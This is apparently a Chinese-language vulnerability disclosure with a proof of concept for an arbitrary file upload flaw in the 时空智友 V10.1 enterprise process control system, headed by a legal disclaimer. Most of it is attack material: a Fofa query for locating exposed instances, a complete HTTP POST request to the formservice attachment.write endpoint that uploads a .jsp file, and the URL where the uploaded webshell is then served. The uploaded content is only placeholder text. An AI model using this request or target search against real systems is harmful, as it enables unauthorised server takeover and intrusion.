免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化，从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在任意文件上传漏洞

漏洞影响

时空智友 V10.1

漏洞危害

未经允许的攻击者可通过上传webshell，接管该服务器

网络测绘

Fofa: app=“时空智友V10.1”

漏洞复现

1. 构造poc

POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 10

testtest

2. 发送数据包，上传文件

3. 访问webshell

webshell地址

http://ip:port/form/temp/202311033wokcf0o8mwxph7y_a.jsp